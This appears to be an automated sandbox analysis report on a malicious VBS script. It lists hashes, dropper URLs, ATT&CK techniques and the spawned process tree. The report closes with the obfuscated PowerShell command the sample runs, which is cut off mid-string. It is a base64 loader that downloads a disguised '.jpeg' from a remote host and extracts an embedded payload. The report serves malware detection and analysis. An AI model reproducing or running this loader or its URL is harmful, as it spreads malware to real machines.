cc67b8be8fc325cf915731f69dd2c36d77c12ea1819726e70ed57170fafd1722

General

Target

cc67b8be8fc325cf915731f69dd2c36d77c12ea1819726e70ed57170fafd1722.vbs
Size

114KB
MD5

ccde7ef0e90a5a62394fafe77c7eff7e
SHA1

197cbc0c7ab873fd02bf2b8a3a17d7b0f44bb003
SHA256

cc67b8be8fc325cf915731f69dd2c36d77c12ea1819726e70ed57170fafd1722
SHA512

047baeb2e3d183605346025f86df3042f596bd2505adf7597ffb2fd972acf9db6bd62d03a3f9b52c9a9ffabca743d5e3c359a5a12fc79a3d6e93fdc8d7930dfe
SSDEEP

1536:FkLcccOgt5pzGUGwIaymHVUJW4Wrle/PhG+/kery+bG8:8gt5pjGwIaymHdS7b

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://servidorwindows.ddns.com.br/Files/vbs.jpeg

exe.dropper

http://servidorwindows.ddns.com.br/Files/vbs.jpeg

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
5	1976	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2320	powershell.exe
1976	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2320	powershell.exe
1976	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2320	powershell.exe
Token: SeDebugPrivilege	1976	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2676 wrote to memory of 2320	2676	WScript.exe	30
PID 2676 wrote to memory of 2320	2676	WScript.exe	30
PID 2676 wrote to memory of 2320	2676	WScript.exe	30
PID 2320 wrote to memory of 1976	2320	powershell.exe	32
PID 2320 wrote to memory of 1976	2320	powershell.exe	32
PID 2320 wrote to memory of 1976	2320	powershell.exe	32

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\cc67b8be8fc325cf915731f69dd2c36d77c12ea1819726e70ed57170fafd1722.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2676
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⤏ ꒼ ⛲ ⫰ 〷Bs⤏ ꒼ ⛲ ⫰ 〷Gk⤏ ꒼ ⛲ ⫰ 〷bgBr⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷PQ⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷Cc⤏ ꒼ ⛲ ⫰ 〷a⤏ ꒼ ⛲ ⫰ 〷B0⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷c⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷6⤏ ꒼ ⛲ ⫰ 〷C8⤏ ꒼ ⛲ ⫰ 〷LwBz⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷cgB2⤏ ꒼ ⛲ ⫰ 〷Gk⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bv⤏ ꒼ ⛲ ⫰ 〷HI⤏ ꒼ ⛲ ⫰ 〷dwBp⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bv⤏ ꒼ ⛲ ⫰ 〷Hc⤏ ꒼ ⛲ ⫰ 〷cw⤏ ꒼ ⛲ ⫰ 〷u⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bu⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷LgBj⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷bQ⤏ ꒼ ⛲ ⫰ 〷u⤏ ꒼ ⛲ ⫰ 〷GI⤏ ꒼ ⛲ ⫰ 〷cg⤏ ꒼ ⛲ ⫰ 〷v⤏ ꒼ ⛲ ⫰ 〷EY⤏ ꒼ ⛲ ⫰ 〷aQBs⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷cw⤏ ꒼ ⛲ ⫰ 〷v⤏ ꒼ ⛲ ⫰ 〷HY⤏ ꒼ ⛲ ⫰ 〷YgBz⤏ ꒼ ⛲ ⫰ 〷C4⤏ ꒼ ⛲ ⫰ 〷agBw⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷Zw⤏ ꒼ ⛲ ⫰ 〷n⤏ ꒼ ⛲ ⫰ 〷Ds⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷Hc⤏ ꒼ ⛲ ⫰ 〷ZQBi⤏ ꒼ ⛲ ⫰ 〷EM⤏ ꒼ ⛲ ⫰ 〷b⤏ ꒼ ⛲ ⫰ 〷Bp⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷bgB0⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷PQ⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷E4⤏ ꒼ ⛲ ⫰ 〷ZQB3⤏ ꒼ ⛲ ⫰ 〷C0⤏ ꒼ ⛲ ⫰ 〷TwBi⤏ ꒼ ⛲ ⫰ 〷Go⤏ ꒼ ⛲ ⫰ 〷ZQBj⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷BT⤏ ꒼ ⛲ ⫰ 〷Hk⤏ ꒼ ⛲ ⫰ 〷cwB0⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷bQ⤏ ꒼ ⛲ ⫰ 〷u⤏ ꒼ ⛲ ⫰ 〷E4⤏ ꒼ ⛲ ⫰ 〷ZQB0⤏ ꒼ ⛲ ⫰ 〷C4⤏ ꒼ ⛲ ⫰ 〷VwBl⤏ ꒼ ⛲ ⫰ 〷GI⤏ ꒼ ⛲ ⫰ 〷QwBs⤏ ꒼ ⛲ ⫰ 〷Gk⤏ ꒼ ⛲ ⫰ 〷ZQBu⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷Ow⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷cgB5⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷ew⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bv⤏ ꒼ ⛲ ⫰ 〷Hc⤏ ꒼ ⛲ ⫰ 〷bgBs⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷YQBk⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷BE⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bh⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷PQ⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷dwBl⤏ ꒼ ⛲ ⫰ 〷GI⤏ ꒼ ⛲ ⫰ 〷QwBs⤏ ꒼ ⛲ ⫰ 〷Gk⤏ ꒼ ⛲ ⫰ 〷ZQBu⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷LgBE⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷dwBu⤏ ꒼ ⛲ ⫰ 〷Gw⤏ ꒼ ⛲ ⫰ 〷bwBh⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷R⤏ ꒼ ⛲ ⫰ 〷Bh⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷YQ⤏ ꒼ ⛲ ⫰ 〷o⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷b⤏ ꒼ ⛲ ⫰ 〷Bp⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷aw⤏ ꒼ ⛲ ⫰ 〷p⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷fQ⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷GM⤏ ꒼ ⛲ ⫰ 〷YQB0⤏ ꒼ ⛲ ⫰ 〷GM⤏ ꒼ ⛲ ⫰ 〷a⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷Hs⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷BX⤏ ꒼ ⛲ ⫰ 〷HI⤏ ꒼ ⛲ ⫰ 〷aQB0⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷LQBI⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷cwB0⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷JwBG⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷aQBs⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷FQ⤏ ꒼ ⛲ ⫰ 〷bw⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷bwB3⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷b⤏ ꒼ ⛲ ⫰ 〷Bv⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷YQB0⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷Bm⤏ ꒼ ⛲ ⫰ 〷HI⤏ ꒼ ⛲ ⫰ 〷bwBt⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷J⤏ ꒼ ⛲ ⫰ 〷Bs⤏ ꒼ ⛲ ⫰ 〷Gk⤏ ꒼ ⛲ ⫰ 〷bgBr⤏ ꒼ ⛲ ⫰ 〷Cc⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷t⤏ ꒼ ⛲ ⫰ 〷EY⤏ ꒼ ⛲ ⫰ 〷bwBy⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷ZwBy⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷dQBu⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷QwBv⤏ ꒼ ⛲ ⫰ 〷Gw⤏ ꒼ ⛲ ⫰ 〷bwBy⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷UgBl⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷Ow⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷e⤏ ꒼ ⛲ ⫰ 〷Bp⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷B9⤏ ꒼ ⛲ ⫰ 〷Ds⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷Bp⤏ ꒼ ⛲ ⫰ 〷GY⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷o⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bv⤏ ꒼ ⛲ ⫰ 〷Hc⤏ ꒼ ⛲ ⫰ 〷bgBs⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷YQBk⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷BE⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bh⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷LQBu⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷dQBs⤏ ꒼ ⛲ ⫰ 〷Gw⤏ ꒼ ⛲ ⫰ 〷KQ⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷Hs⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷Gk⤏ ꒼ ⛲ ⫰ 〷bQBh⤏ ꒼ ⛲ ⫰ 〷Gc⤏ ꒼ ⛲ ⫰ 〷ZQBU⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷e⤏ ꒼ ⛲ ⫰ 〷B0⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷PQ⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷Fs⤏ ꒼ ⛲ ⫰ 〷UwB5⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷G0⤏ ꒼ ⛲ ⫰ 〷LgBU⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷e⤏ ꒼ ⛲ ⫰ 〷B0⤏ ꒼ ⛲ ⫰ 〷C4⤏ ꒼ ⛲ ⫰ 〷RQBu⤏ ꒼ ⛲ ⫰ 〷GM⤏ ꒼ ⛲ ⫰ 〷bwBk⤏ ꒼ ⛲ ⫰ 〷Gk⤏ ꒼ ⛲ ⫰ 〷bgBn⤏ ꒼ ⛲ ⫰ 〷F0⤏ ꒼ ⛲ ⫰ 〷Og⤏ ꒼ ⛲ ⫰ 〷6⤏ ꒼ ⛲ ⫰ 〷FU⤏ ꒼ ⛲ ⫰ 〷V⤏ ꒼ ⛲ ⫰ 〷BG⤏ ꒼ ⛲ ⫰ 〷Dg⤏ ꒼ ⛲ ⫰ 〷LgBH⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷BT⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷cgBp⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Zw⤏ ꒼ ⛲ ⫰ 〷o⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bv⤏ ꒼ ⛲ ⫰ 〷Hc⤏ ꒼ ⛲ ⫰ 〷bgBs⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷YQBk⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷BE⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bh⤏ ꒼ ⛲ ⫰ 〷Ck⤏ ꒼ ⛲ ⫰ 〷Ow⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷cwB0⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷cgB0⤏ ꒼ ⛲ ⫰ 〷EY⤏ ꒼ ⛲ ⫰ 〷b⤏ ꒼ ⛲ ⫰ 〷Bh⤏ ꒼ ⛲ ⫰ 〷Gc⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷9⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷Jw⤏ ꒼ ⛲ ⫰ 〷8⤏ ꒼ ⛲ ⫰ 〷Dw⤏ ꒼ ⛲ ⫰ 〷QgBB⤏ ꒼ ⛲ ⫰ 〷FM⤏ ꒼ ⛲ ⫰ 〷RQ⤏ ꒼ ⛲ ⫰ 〷2⤏ ꒼ ⛲ ⫰ 〷DQ⤏ ꒼ ⛲ ⫰ 〷XwBT⤏ ꒼ ⛲ ⫰ 〷FQ⤏ ꒼ ⛲ ⫰ 〷QQBS⤏ ꒼ ⛲ ⫰ 〷FQ⤏ ꒼ ⛲ ⫰ 〷Pg⤏ ꒼ ⛲ ⫰ 〷+⤏ ꒼ ⛲ ⫰ 〷Cc⤏ ꒼ ⛲ ⫰ 〷Ow⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷ZQBu⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷RgBs⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷Zw⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷D0⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷n⤏ ꒼ ⛲ ⫰ 〷Dw⤏ ꒼ ⛲ ⫰ 〷P⤏ ꒼ ⛲ ⫰ 〷BC⤏ ꒼ ⛲ ⫰ 〷EE⤏ ꒼ ⛲ ⫰ 〷UwBF⤏ ꒼ ⛲ ⫰ 〷DY⤏ ꒼ ⛲ ⫰ 〷N⤏ ꒼ ⛲ ⫰ 〷Bf⤏ ꒼ ⛲ ⫰ 〷EU⤏ ꒼ ⛲ ⫰ 〷TgBE⤏ ꒼ ⛲ ⫰ 〷D4⤏ ꒼ ⛲ ⫰ 〷Pg⤏ ꒼ ⛲ ⫰ 〷n⤏ ꒼ ⛲ ⫰ 〷Ds⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bh⤏ ꒼ ⛲ ⫰ 〷HI⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷BJ⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷Hg⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷9⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷J⤏ ꒼ ⛲ ⫰ 〷Bp⤏ ꒼ ⛲ ⫰ 〷G0⤏ ꒼ ⛲ ⫰ 〷YQBn⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷V⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷Hg⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷u⤏ ꒼ ⛲ ⫰ 〷Ek⤏ ꒼ ⛲ ⫰ 〷bgBk⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷e⤏ ꒼ ⛲ ⫰ 〷BP⤏ ꒼ ⛲ ⫰ 〷GY⤏ ꒼ ⛲ ⫰ 〷K⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bh⤏ ꒼ ⛲ ⫰ 〷HI⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷BG⤏ ꒼ ⛲ ⫰ 〷Gw⤏ ꒼ ⛲ ⫰ 〷YQBn⤏ ꒼ ⛲ ⫰ 〷Ck⤏ ꒼ ⛲ ⫰ 〷Ow⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷ZQBu⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷SQBu⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷ZQB4⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷PQ⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷aQBt⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷ZwBl⤏ ꒼ ⛲ ⫰ 〷FQ⤏ ꒼ ⛲ ⫰ 〷ZQB4⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷LgBJ⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷Hg⤏ ꒼ ⛲ ⫰ 〷TwBm⤏ ꒼ ⛲ ⫰ 〷Cg⤏ ꒼ ⛲ ⫰ 〷J⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷BG⤏ ꒼ ⛲ ⫰ 〷Gw⤏ ꒼ ⛲ ⫰ 〷YQBn⤏ ꒼ ⛲ ⫰ 〷Ck⤏ ꒼ ⛲ ⫰ 〷Ow⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷Gk⤏ ꒼ ⛲ ⫰ 〷Zg⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷Cg⤏ ꒼ ⛲ ⫰ 〷J⤏ ꒼ ⛲ ⫰ 〷Bz⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷YQBy⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷SQBu⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷ZQB4⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷LQBn⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷w⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷LQBh⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷ZQBu⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷SQBu⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷ZQB4⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷LQBn⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bh⤏ ꒼ ⛲ ⫰ 〷HI⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷BJ⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷Hg⤏ ꒼ ⛲ ⫰ 〷KQ⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷Hs⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bh⤏ ꒼ ⛲ ⫰ 〷HI⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷BJ⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷Hg⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷r⤏ ꒼ ⛲ ⫰ 〷D0⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bh⤏ ꒼ ⛲ ⫰ 〷HI⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷BG⤏ ꒼ ⛲ ⫰ 〷Gw⤏ ꒼ ⛲ ⫰ 〷YQBn⤏ ꒼ ⛲ ⫰ 〷C4⤏ ꒼ ⛲ ⫰ 〷T⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷ZwB0⤏ ꒼ ⛲ ⫰ 〷Gg⤏ ꒼ ⛲ ⫰ 〷Ow⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷YgBh⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷ZQ⤏ ꒼ ⛲ ⫰ 〷2⤏ ꒼ ⛲ ⫰ 〷DQ⤏ ꒼ ⛲ ⫰ 〷T⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷ZwB0⤏ ꒼ ⛲ ⫰ 〷Gg⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷9⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷J⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷BJ⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷Hg⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷t⤏ ꒼ 